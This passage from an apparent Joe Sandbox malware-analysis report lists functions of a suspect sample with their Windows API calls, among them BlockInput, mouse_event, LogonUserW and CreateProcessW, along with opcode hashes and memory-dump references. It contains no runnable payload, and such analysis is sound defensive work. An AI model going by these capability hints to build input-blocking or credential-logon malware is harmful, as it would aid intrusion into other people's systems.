                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: f9ab1b3592481f0602fe7af10361e5e79920059600bc7c9f86ce5b326c734c1d
                                    • Instruction ID: 7d0b19a3dc82a7cc84670bc9023bcae9ce88c030dfcfc45bcb3c9b8a2d656ea7
                                    • Opcode Fuzzy Hash: f9ab1b3592481f0602fe7af10361e5e79920059600bc7c9f86ce5b326c734c1d
                                    • Instruction Fuzzy Hash: E52172766345108BCB29CF68C881B52B7E5EB95320B248E6DE4E5CF2D0CB74BA05DB54
                                    Function 009F044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,00000112,?,?), ref: 009F04F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: f226de1359586e4f96b9e5551065f32238932ef5d6c7acd9420d5843e16fcedb
                                    • Instruction ID: 657f6548983b42c7c6b57b1990992f4a74e8510a8dfc16b68e03ad59abdae591
                                    • Opcode Fuzzy Hash: f226de1359586e4f96b9e5551065f32238932ef5d6c7acd9420d5843e16fcedb
                                    • Instruction Fuzzy Hash: B3110671205259BAFB259B2CCC06F7D761CDBC1B20F208718FB165A5F3DA689D419364
                                    Function 009F00AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • NtdllDialogWndProc_W.USER32(?,00000115,?,?,?,?,?,?,009FE467,?,?,?,?,00000000,?), ref: 009F0127
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 94b6d1ab00b6919f00a3fe6f6bdd497118b882c2023eac3d9e1f3e447d9ec1fb
                                    • Instruction ID: 0e4c55462accc20e974188b3fcfbfd5333c142afb2ccad8eef7dd493baeebc1b
                                    • Opcode Fuzzy Hash: 94b6d1ab00b6919f00a3fe6f6bdd497118b882c2023eac3d9e1f3e447d9ec1fb
                                    • Instruction Fuzzy Hash: D801F17570411CABDF149F28DC0ABB93B9EEBC5325F084125FA4917193C335AC21D7A0
                                    Function 009EE9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 009EE9F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$CallLongProc
                                    • String ID:
                                    • API String ID: 4084987330-0
                                    • Opcode ID: c86112b1d34959adef00912a57722352f33cc8473eb727d2f154f387b02bdf04
                                    • Instruction ID: f2ecd01e354b44087695d9ac182e3155ce03364490728a94c843717eebc22353
                                    • Opcode Fuzzy Hash: c86112b1d34959adef00912a57722352f33cc8473eb727d2f154f387b02bdf04
                                    • Instruction Fuzzy Hash: 26F03C3610014CAFCF16EF95EC00D793BAAFB48320B044114FD155B2A2C736EC61EB50
                                    Function 009EEC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                      • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    • NtdllDialogWndProc_W.USER32(?,00000204,?,?,00000001,?,?,?,009FE514,?,?,?,?,?,00000001,?), ref: 009EECCA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    • Opcode ID: 61d6bf72b70d90f251110dc7bceaa347e47a54890d748bf9a90e93c5af488401
                                    • Instruction ID: b5f9cd3e045ba54c8fce2c79e0026e4dd2c5fc3ca3502c9f6a9941f45affd8c3
                                    • Opcode Fuzzy Hash: 61d6bf72b70d90f251110dc7bceaa347e47a54890d748bf9a90e93c5af488401
                                    • Instruction Fuzzy Hash: ADF0E531200228ABDF15AF09DC0AEBE3B65EB40750F004015F9461B2D1C77AACB1DBE0
                                    Function 0099AAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,00000006,?,?,?), ref: 0099AB45
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 15cb66ec60b1a6ee1da307d38ed3e75c41c36f0e4bb8855f67fc13cc6ea7bec6
                                    • Instruction ID: a469be177103406084423796e950e89a2b4da9dedc18a1a9aadcf3e6aed05dda
                                    • Opcode Fuzzy Hash: 15cb66ec60b1a6ee1da307d38ed3e75c41c36f0e4bb8855f67fc13cc6ea7bec6
                                    • Instruction Fuzzy Hash: 3DF08238600209DFDF18DF48EC11A397BA6FB85360F054219FD164B2B0D776D891DB90
                                    Function 009D6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 009D6ACA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 2257c152eae2845f93ea725954e0612ae5ab3078c818e799f76497224c6b8e75
                                    • Instruction ID: 9db1796cd86ba571191abcd37607f600537764b197e506cd2531c9dc5b7a8667
                                    • Opcode Fuzzy Hash: 2257c152eae2845f93ea725954e0612ae5ab3078c818e799f76497224c6b8e75
                                    • Instruction Fuzzy Hash: C4E048362502046FC700EF99D404E56B7ECAFB4751F05C457F945D7391DAB0F8048B90
                                    Function 009C74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009C74DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: 95e4805b7d0254750117be2a15dca9aeeef1a84e4dbfaeae65173f2fdfab489e
                                    • Instruction ID: 6005b7f5c60852551ad185110983045796ef67aa06883c9f69bc5911d23fab06
                                    • Opcode Fuzzy Hash: 95e4805b7d0254750117be2a15dca9aeeef1a84e4dbfaeae65173f2fdfab489e
                                    • Instruction Fuzzy Hash: A1D017A192C20528F82C07A4CC0FF76890AB3107C1F80858DB482990E1A88468069823
                                    Function 009EF609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.USER32(?,00000232,?,?), ref: 009EF649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: f17e10be7c904442a330efe20bf6a8e59d3f669a92d6cdc79c2cdf0f13d600bb
                                    • Instruction ID: 8a58830ff8818cdcb11e003ca84f829e18fccf7a782411bf303d2a1153099755
                                    • Opcode Fuzzy Hash: f17e10be7c904442a330efe20bf6a8e59d3f669a92d6cdc79c2cdf0f13d600bb
                                    • Instruction Fuzzy Hash: E5F06D35242388AFDB21EF98DC15FC6BB99EB56720F054009BA15272E2CB70BC60DB60
                                    Function 0099AB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,00000007,?,00000000,00000000,?,?), ref: 0099AB7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 83241a08ca5d76b274ce5873dfe74be0e7fcf67af8cc3027ede19708065012d0
                                    • Instruction ID: 9ef011fc1507325d29afc1abe590cfc1569431807658e04f57859948b011582d
                                    • Opcode Fuzzy Hash: 83241a08ca5d76b274ce5873dfe74be0e7fcf67af8cc3027ede19708065012d0
                                    • Instruction Fuzzy Hash: C4E0EC39641208FBCF15EF94DD12F687B2AEB89354F104058BA090B2A1CB77A562DB50
                                    Function 009BB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009BAD3E), ref: 009BB124
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: f7e72a0fc15d864526962e1907c5a83fa7fcc36c092c1b09c9bedc33581951e4
                                    • Instruction ID: f1fe9011a56896d56209bcef3387843713c2186392948d9ead223b52662b385a
                                    • Opcode Fuzzy Hash: f7e72a0fc15d864526962e1907c5a83fa7fcc36c092c1b09c9bedc33581951e4
                                    • Instruction Fuzzy Hash: 33D09E331A464EAEDF029FA4DC06EAE3F6AEB04701F448511FA16D50A1C675D532AB50
                                    Function 009EF654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.USER32(?,00000053,?,?,?,009FE4D1,?,?,?,?,?,?), ref: 009EF67F
                                      • Part of subcall function 009EE32E: _memset.LIBCMT ref: 009EE33D
                                      • Part of subcall function 009EE32E: _memset.LIBCMT ref: 009EE34C
                                      • Part of subcall function 009EE32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                      • Part of subcall function 009EE32E: CloseHandle.KERNEL32 ref: 009EE38D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: 3c99040550b7466b303680fe475cdff9e52f345df19a5701bbf23b693f0ab1aa
                                    • Instruction ID: 7e45ee3952c4df00676fba6577cb06a495515f163422322bc2e5432f91416504
                                    • Opcode Fuzzy Hash: 3c99040550b7466b303680fe475cdff9e52f345df19a5701bbf23b693f0ab1aa
                                    • Instruction Fuzzy Hash: 94E04636100248EFCB02DF85DC15E9537A5EB4C758F024016FA04072B1C731AC61EF40
                                    Function 009EF5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.USER32 ref: 009EF5D0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 361d5acc6a5983a4edc5c8dd0ec02b3a2c23a61e9ae82f6c38f20f52c5aa0ad9
                                    • Instruction ID: 246de7b8add01ead0fe30e80ec902ccb9676bf1e3369fa670e02deb7ce1a0818
                                    • Opcode Fuzzy Hash: 361d5acc6a5983a4edc5c8dd0ec02b3a2c23a61e9ae82f6c38f20f52c5aa0ad9
                                    • Instruction Fuzzy Hash: C6E0173924420CEFCB01DFC4DC44E863BA5EB5A350F010054FD044B361C772A871DB61
                                    Function 009EF5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.USER32 ref: 009EF5FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 26ec4f723d6d2966329a9b3334ef8a808777f1171bb4e5acc83867b0620a53fc
                                    • Instruction ID: a2fb3c756d248443f8ec79d36234e08e003792b0145846d8c17e0100ee99c87c
                                    • Opcode Fuzzy Hash: 26ec4f723d6d2966329a9b3334ef8a808777f1171bb4e5acc83867b0620a53fc
                                    • Instruction Fuzzy Hash: 72E0E23924020CEFCB01DFC4DC44E863BA5EB5A350F010054FD044B262C772A861EBA1
                                    Function 0099B715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
                                      • Part of subcall function 0099B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
                                    • NtdllDialogWndProc_W.USER32(?,00000002,00000000,00000000,00000000,?,?,0099B2EF,?,?), ref: 0099B734
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: a65a5888f4c71d8d5501a0d3784029bc52a44ea403fd568996d5b0be2306cbe5
                                    • Instruction ID: 66de6d7b9dd280387e35467505dd03e65e28ead1eb9fbd9489a535b242589e9a
                                    • Opcode Fuzzy Hash: a65a5888f4c71d8d5501a0d3784029bc52a44ea403fd568996d5b0be2306cbe5
                                    • Instruction Fuzzy Hash: DAD0123128030C77DF107BD4EE07F497A1E9BD4750F004010BA042A1D1CB79A5515564
                                    Function 009FB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 7a35ed7291eb2ac50605dbea0652a3cf9d78a0b13b551ccfa7ce63c64f776c51
                                    • Instruction ID: e2ee994b4aef067293afc2897d602b1df1f9dd2b5f62e71653dd7b27437dd6a8
                                    • Opcode Fuzzy Hash: 7a35ed7291eb2ac50605dbea0652a3cf9d78a0b13b551ccfa7ce63c64f776c51
                                    • Instruction Fuzzy Hash: BFC04CF240014DDFD751CFC0C9449EEB7BCAB04301F104095924AF1110D7749B469B72
                                    Function 009A8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009A818F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 71173f5fcf789c2deba532b3cb794c620b14eeb2f53fb6c3ee2afec931f404db
                                    • Instruction ID: 27673cbd04f3bcc20b1a1322de0204d63f605961784268da36c5cbfdcfbf82d0
                                    • Opcode Fuzzy Hash: 71173f5fcf789c2deba532b3cb794c620b14eeb2f53fb6c3ee2afec931f404db
                                    • Instruction Fuzzy Hash: 41A0113200020CABCF002BC2EC088883F2CEA002A0B000020F80C080208B22A8228A82
                                    Function 00993200 Relevance: 1.0, Instructions: 986COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID:
                                    • API String ID: 3964851224-0
                                    • Opcode ID: c85502f966587e7cf9657ff22242438096ae2adf60ff3619a27b8bca9f5b7767
                                    • Instruction ID: 6af0c41b3411ad2064277d26fd32f1709f1bd40136946d4a4d522bb99d4e2bc9
